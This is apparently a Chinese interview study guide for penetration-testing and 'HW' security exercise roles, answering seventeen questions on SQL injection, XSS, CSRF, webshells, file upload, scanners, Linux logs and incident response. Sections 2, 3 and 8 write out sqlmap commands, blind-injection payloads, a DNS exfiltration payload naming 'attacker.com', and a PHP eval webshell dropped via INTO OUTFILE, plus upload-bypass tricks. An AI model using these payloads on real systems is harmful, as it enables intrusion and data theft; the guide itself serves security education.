2025年渗透测试面试题总结-2025年HW(护网面试) 73(题目+回答)
安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
2025年HW(护网面试) 73
1. HTTP Referer
2. SQLMap扫POST注入与批量扫描
3. SQL注入盲注与Getshell
4. XSS原理与防御
5. CSRF防御
6. DDoS原理
7. 阻断Webshell连接
8. 文件上传漏洞
9. 常用漏扫工具
10. 端口防护与入侵响应
11. 渗透测试流程
12. TCP/IP四层模型
13. 查看Linux服务
14. SSH日志位置
15. 查看用户信息
16. NAT两种常用模式
17. 应急响应流程
2025年HW(护网面试) 73
1、说一下http referer 2、sqlmap如何扫post注入,如何批量扫描? 3、sql注入了解吗?盲注流程讲一下,除了sleep函数还有什么?如何getshell? 4、xss的原理,如何防御? 5、csrf的防御 6、ddos的原理 7、webshell已经上传如何禁止菜刀等工具连接 8、讲一下文件上传 9、使用过哪些漏扫工具 10、一个互联网网站端口如何防护,发现入侵如何解决? 11、渗透测试流程 12、TCP/IP四层模型是哪四层 13、linux查看某个服务 14、linux ssh日志放在哪个目录 15、如何查看用户? 16、nat常用的两种模式 17、应急响应
1. HTTP Referer
HTTP Referer(正确拼写应为Referrer,历史拼写错误被保留)是请求头字段,表示请求来源页面的URL。
核心作用:
- 防盗链:阻止非本站域名引用资源(如图片)
- 安全审计:追踪CSRF攻击源头
- 流量分析:统计用户跳转路径
隐私限制:
- 浏览器可配置不发送Referer(如设置
Referrer-Policy: no-referrer
)- HTTPS→HTTP请求时Referer会被剥离
2. SQLMap扫POST注入与批量扫描
POST注入扫描:
bash
sqlmap -u "http://target.com/login" --data="username=test&password=test"
关键参数:
--data
:POST数据--method POST
:指定请求方式--proxy=http://127.0.0.1:8080
:代理到BurpSuite分析批量扫描:
- 创建目标文件(
targets.txt
):http://site1.com/login http://site2.com/search
- 执行批量扫描:
bash
sqlmap -m targets.txt --batch # --batch自动选择默认选项
优化技巧:
- 结合
--threads 5
提升并发效率- 使用
--scope
过滤域名(如--scope "\.example\.com"
)
3. SQL注入盲注与Getshell
盲注流程(以布尔盲注为例):
- 探测注入点:
id=1' and 1=1--+
(正常) vsid=1' and 1=2--+
(异常)- 猜解数据库名:
sql
and (select substr(database(),1,1))='a' -- 逐字符爆破
- 提取表数据:
sql
and (select ascii(substr((select table_name from information_schema.tables limit 0,1),1,1))>100
Sleep替代方案:
- 响应时间盲注:
benchmark(10000000,md5('test'))
(CPU延时)- DNS外带:
load_file(concat('\\\\',(select database()),'.attacker.com\\test'))
- 错误回显:
updatexml(1,concat(0x7e,(version())),1)
Getshell方法:
- 写Webshell:
sql
前提:SELECT '<?php @eval($_POST["cmd"]);?>' INTO OUTFILE '/var/www/html/shell.php'
- 绝对路径已知
secure_file_priv
为空- Web目录有写权限
4. XSS原理与防御
攻击原理:
恶意脚本注入到网页中,浏览器解析执行(如<script>alert(1)</script>
)。
防御方案:
层别 措施 示例工具/代码 输入过滤 转义特殊字符 htmlspecialchars($str)
(PHP)输出编码 按上下文编码(HTML/JS/URL) OWASP Java Encoder Project CSP策略 限制脚本源 Content-Security-Policy: default-src 'self'
HttpOnly 阻止JS访问Cookie Set-Cookie: session=123; HttpOnly
5. CSRF防御
三重防护:
- Token验证:表单添加随机Token(服务器校验)
html
<input type="hidden" name="csrf_token" value="{random_token}">
- SameSite Cookie:
http
Set-Cookie: session=abc; SameSite=Lax // 或Strict
- 关键操作二次验证:密码/短信确认
6. DDoS原理
攻击本质:耗尽目标资源(带宽、连接数、CPU)
常见类型:
类型 攻击层 案例 流量型(Volumetric) 网络层 UDP Flood、ICMP Flood 协议型(Protocol) 传输层 SYN Flood、Ping of Death 应用层(Application) 应用层 HTTP Flood、Slowloris
7. 阻断Webshell连接
四步应急响应:
- 隔离主机:防火墙阻断出站(防止反弹Shell)
- 删除恶意文件:
bash
find /var/www -name "*.jsp" -mtime -1 -delete # 清理新增可疑文件
- 阻断工具指纹:
- WAF/IPS添加规则:拦截User-Agent含
C
(菜刀特征)的请求- 加固服务器:
- 禁用危险函数(PHP中
disable_functions=system,passthru
)- 限制Web目录执行权限:
chmod -R 755 /var/www
8. 文件上传漏洞
攻击方式:
- 后缀绕过:
.php5
、.phtml
- Content-Type伪造:
image/jpeg
- 文件头伪造:GIF89a头+PHP代码
- 竞争条件:上传临时文件时快速访问
防御方案:
mermaid
graph LR A[文件上传] --> B[后缀白名单] A --> C[文件头校验] A --> D[重命名文件] A --> E[存储到非Web目录] A --> F[图片二次渲染]
9. 常用漏扫工具
工具 类型 场景 Nessus 综合漏洞扫描 网络设备/系统漏洞 Burp Suite Pro Web应用扫描 API测试/XSS验证 OpenVAS 开源替代Nessus 低成本基础扫描 Nuclei 定制化POC扫描 快速检测0day WPScan 专项扫描 WordPress漏洞
10. 端口防护与入侵响应
端口防护:
- 最小化暴露:防火墙仅开放80/443
- 端口伪装:修改SSH默认端口(
/etc/ssh/sshd_config
)- 网络隔离:DB服务器仅允许App服务器IP访问
入侵响应流程:
- 取证:备份内存+磁盘镜像
- 溯源:
- 查询命令历史:
history | grep -E 'wget|curl'
- 分析进程树:
pstree -p
- 清除后门:检查定时任务、
authorized_keys
文件- 修复漏洞:升级软件/打补丁
11. 渗透测试流程
标准PTES阶段:
- 情报收集:Whois/子域名/端口扫描
- 威胁建模:绘制攻击面(如OWASP Threat Dragon)
- 漏洞分析:结合手动+自动化工具
- 漏洞利用:获取Shell/数据
- 后渗透:权限提升/横向移动
- 报告输出:风险评级+修复建议
12. TCP/IP四层模型
层级 功能 协议举例 网络接口层 物理传输 Ethernet, WiFi 网际层 寻址与路由 IP, ICMP 传输层 端到端通信 TCP, UDP 应用层 应用程序服务 HTTP, FTP, DNS
13. 查看Linux服务
方法汇总:
bash
systemctl list-units --type=service # systemd系统 service --status-all # SysVinit系统 ps -aux | grep nginx # 进程级检查
14. SSH日志位置
- 认证日志:
/var/log/auth.log
(Debian/Ubuntu)- 安全日志:
/var/log/secure
(CentOS/RHEL)
关键命令:bash
grep 'Failed password' /var/log/auth.log # 检查暴力破解
15. 查看用户信息
bash
id root # 指定用户信息 cat /etc/passwd # 所有用户列表 lastlog # 最近登录记录 w # 当前登录用户
16. NAT两种常用模式
模式 原理 应用场景 SNAT (源NAT) 修改源IP,内网→外网 企业共享上网 DNAT (目的NAT) 修改目标IP,外网访问内网服务 端口映射(如Web)
17. 应急响应流程
PDCERF模型:
- 准备(Preparation):
- 工具包:镜像工具(DD)/内存取证(Volatility)
- 检测(Detection):
- 告警分析:HIDS/SIEM异常(如
root
用户非办公时段登录)- 遏制(Containment):
- 离线隔离:拔网线 > 防火墙封IP
- 根除(Eradication):
- 清除持久化:检查
crontab
、.ssh/authorized_keys
- 恢复(Recovery):
- 重建系统:从洁净备份还原
- 跟进(Follow-up):
- 复盘报告:根本原因分析(如弱密码导致入侵)